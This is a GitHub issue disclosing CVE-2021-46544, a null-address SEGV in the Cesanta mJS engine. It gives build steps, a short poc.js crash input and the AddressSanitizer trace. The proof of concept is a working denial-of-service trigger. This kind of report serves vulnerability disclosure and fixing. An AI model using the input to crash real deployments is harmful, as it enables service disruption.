Headline
CVE-2021-46544: SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19) · Issue #220 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19. This vulnerability can lead to a Denial of Service (DoS).
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test casepoc.js
let a = [];
for (let k = 0; k < 5; ++k) {
a[gc(gc(JSON.stringify(gc('#1.1: -0 - -0 === 0. Actual: '))))](0, a[k]());
}
Execution steps & Output
$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==30781==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f716475ce1a bp 0x7ffee0cc88e0 sp 0x7ffee0cc8040 T0) ==30781==The signal is caused by a READ memory access. ==30781==Hint: address points to the zero page. #0 0x7f716475ce19 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19) #1 0x55af535c987a in getprop_builtin_array src/mjs_exec.c:476 #2 0x55af535c987a in getprop_builtin src/mjs_exec.c:536 #3 0x55af535c987a in mjs_execute src/mjs_exec.c:690 #4 0x55af535d2a05 in mjs_exec_internal src/mjs_exec.c:1073 #5 0x55af535d2a05 in mjs_exec_file src/mjs_exec.c:1096 #6 0x55af5358f909 in main src/mjs_main.c:47 #7 0x7f716412fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55af53590449 in _start (/usr/local/bin/mjs+0xe449)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x59e19) ==30781==ABORTING
Credits: Found by OWL337 team.